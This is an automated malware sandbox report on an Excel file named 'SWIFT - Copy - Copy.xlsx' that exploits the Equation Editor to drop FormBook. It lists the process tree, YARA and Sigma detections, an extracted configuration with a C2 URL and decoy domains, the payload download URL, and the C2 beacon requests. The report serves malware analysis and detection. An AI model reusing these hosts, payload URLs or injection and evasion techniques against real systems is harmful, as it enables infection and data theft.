Loading ...

Play interactive tourEdit tour

Windows Analysis Report SWIFT - Copy - Copy.xlsx

Overview

General Information

Sample Name:SWIFT - Copy - Copy.xlsx
Analysis ID:553293
MD5:338cbe8a882d7c941afe2cf895055bd5
SHA1:f081a9d12054b2e1a59d3eae4fa65059db634268
SHA256:097ce13d935a168aa627794fce83fb57b3ad39989c46b574acb13820edbafe4a
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
.NET source code contains method to dynamically call methods (often used by packers)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1928 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2568 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • Pcportk28.exe (PID: 2124 cmdline: C:\Users\Public\Pcportk28.exe MD5: 25EE51200E7D86AB2C531748E5C01C72)
      • Pcportk28.exe (PID: 1964 cmdline: C:\Users\Public\Pcportk28.exe MD5: 25EE51200E7D86AB2C531748E5C01C72)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wininit.exe (PID: 1760 cmdline: C:\Windows\SysWOW64\wininit.exe MD5: B5C5DCAD3899512020D135600129D665)
            • cmd.exe (PID: 2564 cmdline: /c del "C:\Users\Public\Pcportk28.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.healingandhealthy.com/i6ro/"], "decoy": ["annahve.xyz", "636851.com", "cngm7e.com", "iloveapple62.com", "zdbhl.com", "becu84ts.com", "buongpuso.com", "qhwl2017.com", "savarsell.com", "anentbottskeen.com", "vyounglighting.com", "executive-air.net", "elaish.com", "ilmarijuanadispensary.com", "online-bolgar18.com", "qubtantoys.com", "tkspoboys.com", "hackensackfitness.com", "bitcointradel.com", "nightcanteen.com", "skillga.com", "luckyfandom.com", "tonghetaiye.com", "victoriajayde.com", "domainsraj.com", "campervan.love", "sumiyoshiku-inoitami.xyz", "gpawidegroup.com", "potserve.com", "sdunifiednursingcollege.com", "nutcrackernoww.com", "australishomes.com", "salonautostock.com", "carbsupplements.com", "zj7aszamjwe3.biz", "bundesfinanzeministerium-de.com", "petips.xyz", "woodstor.com", "common-criteria-isac.com", "kidskarateonline.com", "fisioletsgo.com", "thelukeliu.com", "boxedwallconsepts.net", "nvgso.com", "hanssuter.com", "proceam.com", "sehatherba.online", "goldenconcept.art", "zaar.solutions", "turmoilgomkww.xyz", "subritulandoando.com", "rashil.digital", "airlesscondimentdispenser.com", "eygtogel021.com", "freeadakahamazon.com", "sahumeriosartesanales.com", "tackle.tools", "sharifulmer.online", "rushpcbtest.info", "epilepsycolorado.online", "birdy3000.com", "aracsozluk.com", "air-watches.com", "xiexingyu.top"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.Pcportk28.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.Pcportk28.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.Pcportk28.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        5.0.Pcportk28.exe.400000.9.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.Pcportk28.exe.400000.9.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 25 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 131.153.37.4, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2568, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2568, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\Pcportk28.exe, CommandLine: C:\Users\Public\Pcportk28.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Pcportk28.exe, NewProcessName: C:\Users\Public\Pcportk28.exe, OriginalFileName: C:\Users\Public\Pcportk28.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2568, ProcessCommandLine: C:\Users\Public\Pcportk28.exe, ProcessId: 2124
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\Pcportk28.exe, CommandLine: C:\Users\Public\Pcportk28.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Pcportk28.exe, NewProcessName: C:\Users\Public\Pcportk28.exe, OriginalFileName: C:\Users\Public\Pcportk28.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2568, ProcessCommandLine: C:\Users\Public\Pcportk28.exe, ProcessId: 2124
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\wininit.exe, CommandLine: C:\Windows\SysWOW64\wininit.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wininit.exe, NewProcessName: C:\Windows\SysWOW64\wininit.exe, OriginalFileName: C:\Windows\SysWOW64\wininit.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\wininit.exe, ProcessId: 1760

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.healingandhealthy.com/i6ro/"], "decoy": ["annahve.xyz", "636851.com", "cngm7e.com", "iloveapple62.com", "zdbhl.com", "becu84ts.com", "buongpuso.com", "qhwl2017.com", "savarsell.com", "anentbottskeen.com", "vyounglighting.com", "executive-air.net", "elaish.com", "ilmarijuanadispensary.com", "online-bolgar18.com", "qubtantoys.com", "tkspoboys.com", "hackensackfitness.com", "bitcointradel.com", "nightcanteen.com", "skillga.com", "luckyfandom.com", "tonghetaiye.com", "victoriajayde.com", "domainsraj.com", "campervan.love", "sumiyoshiku-inoitami.xyz", "gpawidegroup.com", "potserve.com", "sdunifiednursingcollege.com", "nutcrackernoww.com", "australishomes.com", "salonautostock.com", "carbsupplements.com", "zj7aszamjwe3.biz", "bundesfinanzeministerium-de.com", "petips.xyz", "woodstor.com", "common-criteria-isac.com", "kidskarateonline.com", "fisioletsgo.com", "thelukeliu.com", "boxedwallconsepts.net", "nvgso.com", "hanssuter.com", "proceam.com", "sehatherba.online", "goldenconcept.art", "zaar.solutions", "turmoilgomkww.xyz", "subritulandoando.com", "rashil.digital", "airlesscondimentdispenser.com", "eygtogel021.com", "freeadakahamazon.com", "sahumeriosartesanales.com", "tackle.tools", "sharifulmer.online", "rushpcbtest.info", "epilepsycolorado.online", "birdy3000.com", "aracsozluk.com", "air-watches.com", "xiexingyu.top"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://mikeloayza.com/E9/i4L.exeAvira URL Cloud: Label: malware
          Source: https://mikeloayza.com/E9/i4L.exeAvira URL Cloud: Label: malware
          Machine Learning detection for sampleShow sources
          Source: SWIFT - Copy - Copy.xlsxJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\Pcportk28.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exeJoe Sandbox ML: detected
          Source: 5.2.Pcportk28.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.Pcportk28.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.Pcportk28.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.Pcportk28.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Pcportk28.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Pcportk28.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: unknownHTTPS traffic detected: 131.153.37.4:443 -> 192.168.2.22:49168 version: TLS 1.2
          Source: Binary string: wininit.pdb source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
          Source: Binary string: ILi.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp
          Source: global trafficDNS query: name: mikeloayza.com
          Source: C:\Users\Public\Pcportk28.exeCode function: 4x nop then pop ebx
          Source: C:\Users\Public\Pcportk28.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\Pcportk28.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop ebx
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 131.153.37.4:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 131.153.37.4:443

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.executive-air.net
          Source: C:\Windows\explorer.exeDomain query: www.bitcointradel.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.209.73 80
          Source: C:\Windows\explorer.exeDomain query: www.freeadakahamazon.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.67.131.217 80
          Source: C:\Windows\explorer.exeDomain query: www.fisioletsgo.com
          Source: C:\Windows\explorer.exeDomain query: www.luckyfandom.com
          Source: C:\Windows\explorer.exeNetwork Connect: 216.239.34.21 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.healingandhealthy.com/i6ro/
          Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
          Source: Joe Sandbox ViewASN Name: CLEAR-AS-APClearNetworksPtyLtdAU CLEAR-AS-APClearNetworksPtyLtdAU
          Source: Joe Sandbox ViewASN Name: SSASN2US SSASN2US
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1Host: www.fisioletsgo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1Host: www.bitcointradel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1Host: www.executive-air.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1Host: www.luckyfandom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 118.67.131.217 118.67.131.217
          Source: global trafficHTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: mikeloayza.com
          Source: global trafficHTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mikeloayza.comConnection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 15:06:04 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be761-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.551082192.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.499989252.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551993194.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
